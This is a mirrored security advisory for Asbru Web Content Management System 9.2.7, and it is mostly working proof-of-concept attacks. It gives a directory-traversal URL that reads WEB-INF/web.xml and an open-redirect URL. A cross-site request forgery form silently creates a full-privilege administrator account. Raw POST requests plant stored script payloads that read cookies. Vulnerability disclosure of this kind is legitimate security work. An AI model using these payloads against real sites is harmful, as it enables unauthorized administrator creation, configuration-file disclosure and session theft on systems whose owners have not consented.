Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

2016.04.06

Credit: Gjoko 'LiquidWorm' Krstic

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79
CWE-22
CWE-352

﻿Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value="&#13;&#10;&lt;TEST&gt;&lt;&#47;TEST&gt;&#13;&#10;" />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test&#64;testingus&#46;io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account&#32;Managers" />
<input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event&#32;Managers" />
<input type="hidden" name="usergroups" value="Financial&#32;Officers" />
<input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
<input type="hidden" name="usergroups" value="Human&#32;Resources" />
<input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
<input type="hidden" name="usergroups" value="Intranet&#32;Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press&#32;Officers" />
<input type="hidden" name="usergroups" value="Product&#32;Managers" />
<input type="hidden" name="usergroups" value="Registered&#32;Users" />
<input type="hidden" name="usergroups" value="Shop&#32;Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
<input type="hidden" name="usergroups" value="User&#32;Managers" />
<input type="hidden" name="usergroups" value="Website&#32;Administrators" />
<input type="hidden" name="usergroups" value="Website&#32;Developers" />
<input type="hidden" name="users&#95;group" value="" />
<input type="hidden" name="users&#95;type" value="" />
<input type="hidden" name="creators&#95;group" value="" />
<input type="hidden" name="creators&#95;type" value="" />
<input type="hidden" name="editors&#95;group" value="" />
<input type="hidden" name="editors&#95;type" value="" />
<input type="hidden" name="publishers&#95;group" value="" />
<input type="hidden" name="publishers&#95;type" value="" />
<input type="hidden" name="administrators&#95;group" value="" />
<input type="hidden" name="administrators&#95;type" value="" />
<input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
<input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
<input type="hidden" name="scheduled&#95;notify" value="" />
<input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
<input type="hidden" name="scheduled&#95;unpublish" value="" />
<input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
<input type="hidden" name="invoice&#95;name" value="Icebreaker" />
<input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
<input type="hidden" name="invoice&#95;address" value="nu" />
<input type="hidden" name="invoice&#95;postalcode" value="1300" />
<input type="hidden" name="invoice&#95;city" value="Neverland" />
<input type="hidden" name="invoice&#95;state" value="ND" />
<input type="hidden" name="invoice&#95;country" value="ND" />
<input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
<input type="hidden" name="invoice&#95;fax" value="" />
<input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
<input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
<input type="hidden" name="delivery&#95;name" value="" />
<input type="hidden" name="delivery&#95;organisation" value="" />
<input type="hidden" name="delivery&#95;address" value="" />
<input type="hidden" name="delivery&#95;postalcode" value="" />
<input type="hidden" name="delivery&#95;city" value="" />
<input type="hidden" name="delivery&#95;state" value="" />
<input type="hidden" name="delivery&#95;country" value="" />
<input type="hidden" name="delivery&#95;phone" value="" />
<input type="hidden" name="delivery&#95;fax" value="" />
<input type="hidden" name="delivery&#95;email" value="" />
<input type="hidden" name="delivery&#95;website" value="" />
<input type="hidden" name="card&#95;type" value="VISA" />
<input type="hidden" name="card&#95;number" value="4444333322221111" />
<input type="hidden" name="card&#95;issuedmonth" value="01" />
<input type="hidden" name="card&#95;issuedyear" value="2016" />
<input type="hidden" name="card&#95;expirymonth" value="01" />
<input type="hidden" name="card&#95;expiryyear" value="2100" />
<input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
<input type="hidden" name="card&#95;cvc" value="133" />
<input type="hidden" name="card&#95;issue" value="" />
<input type="hidden" name="card&#95;postalcode" value="1300" />
<input type="hidden" name="content&#95;editor" value="" />
<input type="hidden" name="hardcore&#95;upload" value="" />
<input type="hidden" name="hardcore&#95;format" value="" />
<input type="hidden" name="hardcore&#95;width" value="" />
<input type="hidden" name="hardcore&#95;height" value="" />
<input type="hidden" name="hardcore&#95;onenter" value="" />
<input type="hidden" name="hardcore&#95;onctrlenter" value="" />
<input type="hidden" name="hardcore&#95;onshiftenter" value="" />
<input type="hidden" name="hardcore&#95;onaltenter" value="" />
<input type="hidden" name="hardcore&#95;toolbar1" value="" />
<input type="hidden" name="hardcore&#95;toolbar2" value="" />
<input type="hidden" name="hardcore&#95;toolbar3" value="" />
<input type="hidden" name="hardcore&#95;toolbar4" value="" />
<input type="hidden" name="hardcore&#95;toolbar5" value="" />
<input type="hidden" name="hardcore&#95;formatblock" value="" />
<input type="hidden" name="hardcore&#95;fontname" value="" />
<input type="hidden" name="hardcore&#95;fontsize" value="" />
<input type="hidden" name="hardcore&#95;customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace&#95;sections" value="" />
<input type="hidden" name="index&#95;workspace" value="" />
<input type="hidden" name="index&#95;content" value="" />
<input type="hidden" name="index&#95;library" value="" />
<input type="hidden" name="index&#95;product" value="" />
<input type="hidden" name="index&#95;stock" value="" />
<input type="hidden" name="index&#95;order" value="" />
<input type="hidden" name="index&#95;segments" value="" />
<input type="hidden" name="index&#95;usertests" value="" />
<input type="hidden" name="index&#95;heatmaps" value="" />
<input type="hidden" name="index&#95;user" value="" />
<input type="hidden" name="index&#95;websites" value="" />
<input type="hidden" name="menu&#95;selection" value="" />
<input type="hidden" name="statistics&#95;reports" value="" />
<input type="hidden" name="sales&#95;reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.